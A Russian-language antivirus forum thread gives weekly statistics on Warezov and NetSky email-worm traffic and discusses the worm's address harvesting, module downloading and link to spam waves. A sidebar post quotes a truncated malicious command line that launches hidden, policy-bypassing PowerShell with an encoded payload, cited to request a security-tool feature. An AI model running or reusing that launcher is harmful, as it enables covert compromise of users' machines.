Перейти к содержанию
_Stout

Опять Warezov. Статистика за 7 дней и факты

Recommended Posts

_Stout

Итак, статистика за 7 дней недели. Данные предоставлены Kaspersky Hosted Security (www.HostedSecurity.ru)

Самые "популярные" вредоносы почтового трафика за последние 7 дней:

Email-Worm.Win32.Warezov.dn 36.8%

Email-Worm.Win32.Warezov.ev 18.6%

Email-Worm.Win32.Warezov.do 7.90%

Email-Worm.Win32.NetSky.q 5.62%

Email-Worm.Win32.Warezov.eu 5.40%

Email-Worm.Win32.Warezov.dc 3.25%

Email-Worm.Win32.NetSky.aa 3.16%

Email-Worm.Win32.Warezov.ep 2.63%

Email-Worm.Win32.NetSky.b 2.48%

Other 14.0%

Сегодня:

Email-Worm.Win32.Warezov.ev 61.4%

Email-Worm.Win32.Warezov.eu 14.4%

Email-Worm.Win32.Warezov.dc 7.21%

Email-Worm.Win32.NetSky.q 3.74%

Email-Worm.Win32.Warezov.ew 3.58%

Email-Worm.Win32.Warezov.do 2.98%

Email-Worm.Win32.Warezov.dn 2.23%

Email-Worm.Win32.NetSky.aa 1.95%

Email-Worm.Win32.Warezov.et 0.47%

Other 1.95%

NetSky вытеснет с топов!

%% вредоносов в почтовом потоке

21 - 3,41%

22 - 5,07%

23 - 7,17%

24 - 0,46%

25 - 0,31%

26 - 0,88%

27 - 5,92%

Warezov кроме того, что плодится еще и ворует адреса электронной почты. Во время вирусного затишья, мы зафиксировали всплеск активности спамеров 24 и 25 октября, как раз после массовой рассылки. Кол-ва спама в потоке превысило 91% (обычно около 80-85%).

Сегодня была тоже большая рассылка и мы ожидаем всплеск спам рассылки в понедельник.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dexter
еще и ворует адреса электронной почты

Это вроде новое?

Может кто-нибудь объяснить физический смысл этой рассылки

Limar/Warezov/Stration ?

Удовольствие?

Слава?

Проверка реакции антивирусов?

Отработка технологий?

Ждут ли специалисты продолжения в новом содержании?

По-моему, достаточно удивительный червяк для сегодня.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Денис Лебедев

Это вроде новое?
Да нет, не новое. Он создаёт для себя файл(ы) с расширением *.wax. Если его открыть даже просто блокнотом, то можно будет лецизреть все те мыла, который он собрал для себя. Причем файл(ы) этот(эти) могут достигать размера нескольких десятков метров.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dexter

Так что, суть только в распространении?

А дальше что?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout
Это вроде новое?
Да нет, не новое. Он создаёт для себя файл(ы) с расширением *.wax. Если его открыть даже просто блокнотом, то можно будет лецизреть все те мыла, который он собрал для себя. Причем файл(ы) этот(эти) могут достигать размера нескольких десятков метров.

Ну и посылает эти данные на свои вэб сайты. Примерно со скоростью 100 адресов в секунду на каждый

Добавлено спустя 1 минуту 18 секунд:

Так что, суть только в распространении?

А дальше что?

А дальше? Дальше кража персональных данных, установка проски и распространение не только себя, но и Pinch. Да все что угодно -- червь имеет ф-цию дотаскивания модулей из интернета. Мало?

Добавлено спустя 1 минуту 15 секунд:

Может кто-нибудь объяснить физический смысл этой рассылки

Limar/Warezov/Stration ?

Удовольствие?

Слава?

Проверка реакции антивирусов?

Отработка технологий?

Ждут ли специалисты продолжения в новом содержании?

Одна из целей -- кража персональных данныс с целью перепродажи. Продолжение обязательно будет. С начала недели атака спамеров.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Warezov кроме того, что плодится еще и ворует адреса электронной почты. Во время вирусного затишья, мы зафиксировали всплеск активности спамеров 24 и 25 октября, как раз после массовой рассылки. Кол-ва спама в потоке превысило 91% (обычно около 80-85%).

Да уж ... столько спама на наши ящики еще не валилось никогда ... процент спама был где-то около 95% :(

Так что, суть только в распространении?

А дальше что?

А рассылка спама? Это вполне приличные деньги. Адреса есть, зараженные машины есть, все карты у людей.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Олег Рагозин

Сегодня похоже пошла очередная волна эпидемии.

Я уже получил за полдня 12 писем, содержащих Worm.Stration.WX по классификации DrWeb.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout
Сегодня похоже пошла очередная волна эпидемии.

Я уже получил за полдня 12 писем, содержащих Worm.Stration.WX по классификации DrWeb.

DrWeb называет Limar. А Сегодня активно рассылается Warezov.hb (старый вариант, обнаружен в понедельник). Были часы, когда в трафике его было больше 10%.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

_Stout, а по источникам распространения что-то поменялось по сравнению с началом "затяжной эпидемии"?

Для рассылки используются в большей части зомби-машины или все же какие-то несколько узлов в сети?

Помогает ли применение репутационых фильтров для предотвращения подобных вирусных атак?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout
_Stout, а по источникам распространения что-то поменялось по сравнению с началом "затяжной эпидемии"?

Для рассылки используются в большей части зомби-машины или все же какие-то несколько узлов в сети?

Помогает ли применение репутационых фильтров для предотвращения подобных вирусных атак?

Зомби машины. Диких вирусов практически нет. Обычно дикие экземпляры бывают в первый и второй дни рассылки, потом уже нет. Вобще, я сильно удивлен, что сегодня была разослана старая версия червя. Есть одна версия почему так: за рассылу заплатили заранее, а к пятнице не получилось подогнать новую версию. Но рассыльщики, как честные бизнесмены, разослали старую версию червя. ;-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×